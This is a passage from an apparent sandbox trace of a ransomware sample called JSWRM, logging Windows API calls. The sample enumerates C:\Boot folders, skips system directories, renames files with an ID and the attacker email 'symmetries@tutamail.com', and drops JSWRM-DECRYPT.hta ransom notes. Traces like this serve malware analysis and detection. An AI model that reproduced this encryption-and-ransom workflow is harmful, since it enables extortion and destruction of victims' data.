lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0063.965] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0063.965] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8638, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0063.965] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0063.965] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0063.965] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0063.965] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0063.965] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0063.965] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0063.965] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c220 [0063.965] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x225b30 [0063.965] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c220 | out: hHeap=0x1e0000) returned 1 [0063.965] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236800 [0063.965] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225b30 | out: hHeap=0x1e0000) returned 1 [0063.965] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0063.965] MoveFileW (lpExistingFileName="C:\\Boot\\hu-HU\\bootmgr.exe.mui" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui"), lpNewFileName="C:\\Boot\\hu-HU\\bootmgr.exe.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0063.965] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0063.965] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0063.965] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0063.966] FindNextFileW (in: hFindFile=0x2321c0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1cc753ad, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1cc753ad, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1cc9eb3d, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0063.966] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0063.966] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0063.966] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0063.966] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0063.966] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0063.966] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0063.966] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0063.966] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0063.966] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0063.966] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0063.966] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0063.966] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0063.966] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0063.966] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241308, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0063.966] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0063.966] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0063.966] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0063.966] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0063.966] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241330, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0063.966] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0063.966] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0063.966] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0063.966] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0063.966] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0063.966] FindNextFileW (in: hFindFile=0x2321c0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5c171b, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf39d81d8, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb398, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0063.966] lstrcmpiW (lpString1="memtest.exe.mui", lpString2=".") returned 1 [0063.966] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="..") returned 1 [0063.966] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="...") returned 1 [0063.966] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="windows") returned -1 [0063.966] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="recovery") returned -1 [0063.966] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="perflogs") returned -1 [0063.966] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="documents and settings") returned 1 [0063.967] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="$RECYCLE.BIN") returned 1 [0063.967] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="system volume information") returned -1 [0063.967] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="msocache") returned -1 [0063.967] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0063.967] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="memtest.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0063.967] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="memtest.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f610, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memtest.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0063.967] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0063.967] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0063.967] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="memtest.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0063.967] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="memtest.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f5e0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memtest.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0063.967] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0063.967] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0063.967] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0063.967] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0063.967] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0063.967] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0063.967] CreateFileW (lpFileName="C:\\Boot\\hu-HU\\memtest.exe.mui" (normalized: "c:\\boot\\hu-hu\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0063.967] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=9251806234337896) returned 0 [0063.967] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0063.967] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2471a8 [0063.967] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x2471a8, lpNumberOfBytesRead=0x345f2d4*=0x0, lpOverlapped=0x0) returned 0 [0063.967] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0063.967] CloseHandle (hObject=0xffffffff) returned 1 [0063.967] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dec0 [0063.967] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0063.967] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0063.967] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f87c0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0063.967] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0063.967] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0063.968] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0063.968] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0063.968] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0063.968] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0063.968] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c380 [0063.968] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x2260b0 [0063.968] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c380 | out: hHeap=0x1e0000) returned 1 [0063.968] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0063.968] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2260b0 | out: hHeap=0x1e0000) returned 1 [0063.968] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0063.968] MoveFileW (lpExistingFileName="C:\\Boot\\hu-HU\\memtest.exe.mui" (normalized: "c:\\boot\\hu-hu\\memtest.exe.mui"), lpNewFileName="C:\\Boot\\hu-HU\\memtest.exe.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\boot\\hu-hu\\memtest.exe.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0063.968] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0063.968] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dec0 | out: hHeap=0x1e0000) returned 1 [0063.968] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0063.968] FindNextFileW (in: hFindFile=0x2321c0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5c171b, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf39d81d8, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb398, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0063.968] FindClose (in: hFindFile=0x2321c0 | out: hFindFile=0x2321c0) returned 1 [0063.968] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0063.968] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0063.968] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0063.968] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010ccad, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5d8ab4, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345f828, cFileName="it-IT", cAlternateFileName="")) returned 1 [0063.968] lstrcmpiW (lpString1="it-IT", lpString2=".") returned 1 [0063.968] lstrcmpiW (lpString1="it-IT", lpString2="..") returned 1 [0063.968] lstrcmpiW (lpString1="it-IT", lpString2="...") returned 1 [0063.968] lstrcmpiW (lpString1="it-IT", lpString2="windows") returned -1 [0063.968] lstrcmpiW (lpString1="it-IT", lpString2="recovery") returned -1 [0063.968] lstrcmpiW (lpString1="it-IT", lpString2="perflogs") returned -1 [0063.968] lstrcmpiW (lpString1="it-IT", lpString2="documents and settings") returned 1 [0063.968] lstrcmpiW (lpString1="it-IT", lpString2="$RECYCLE.BIN") returned 1 [0063.968] lstrcmpiW (lpString1="it-IT", lpString2="system volume information") returned -1 [0063.969] lstrcmpiW (lpString1="it-IT", lpString2="msocache") returned -1 [0063.969] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0063.969] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0063.969] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0063.969] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0063.969] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x46) returned 0x236c78 [0063.969] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0063.969] GetFileAttributesW (lpFileName="C:\\Boot\\it-IT\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\it-it\\jswrm-decrypt.hta")) returned 0xffffffff [0063.969] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236c78 | out: hHeap=0x1e0000) returned 1 [0063.969] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0063.969] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345c52c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0063.969] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0063.969] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x23cc80 [0063.969] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0063.969] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x2471a8 [0063.969] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cc80 | out: hHeap=0x1e0000) returned 1 [0063.969] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0063.969] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x46) returned 0x237308 [0063.969] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0063.969] CreateFileW (lpFileName="C:\\Boot\\it-IT\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\it-it\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0063.969] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0063.969] WriteFile (in: hFile=0x450, lpBuffer=0x345c640*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345c60c, lpOverlapped=0x0 | out: lpBuffer=0x345c640*, lpNumberOfBytesWritten=0x345c60c*=0x230c, lpOverlapped=0x0) returned 1 [0063.970] CloseHandle (hObject=0x450) returned 1 [0063.971] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x237308 | out: hHeap=0x1e0000) returned 1 [0063.971] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0063.972] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0063.972] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0063.972] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0063.972] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0063.972] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0063.972] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x46) returned 0x237308 [0063.972] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0063.972] GetFileAttributesW (lpFileName="C:\\Boot\\it-IT\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\it-it\\jswrm-decrypt.hta")) returned 0x20 [0063.972] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x237308 | out: hHeap=0x1e0000) returned 1 [0063.972] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0063.972] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0063.972] FindFirstFileW (in: lpFileName="C:\\Boot\\it-IT\\*.*", lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010ccad, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1cc9eb3d, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName=".", cAlternateFileName="")) returned 0x232000 [0063.972] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0063.972] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010ccad, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1cc9eb3d, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="..", cAlternateFileName="")) returned 1 [0063.972] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0063.972] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0063.972] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48a0490, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2123921c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12d58, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0063.973] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2=".") returned 1 [0063.973] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="..") returned 1 [0063.973] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="...") returned 1 [0063.973] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="windows") returned -1 [0063.973] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="recovery") returned -1 [0063.973] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="perflogs") returned -1 [0063.973] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="documents and settings") returned -1 [0063.973] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$RECYCLE.BIN") returned 1 [0063.973] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="system volume information") returned -1 [0063.973] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="msocache") returned -1 [0063.973] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0063.973] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0063.973] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f610, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0063.973] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0063.973] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0063.973] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0063.973] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f5e0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0063.973] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0063.973] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0063.973] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0063.973] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0063.973] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0063.973] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0063.973] CreateFileW (lpFileName="C:\\Boot\\it-IT\\bootmgr.exe.mui" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, 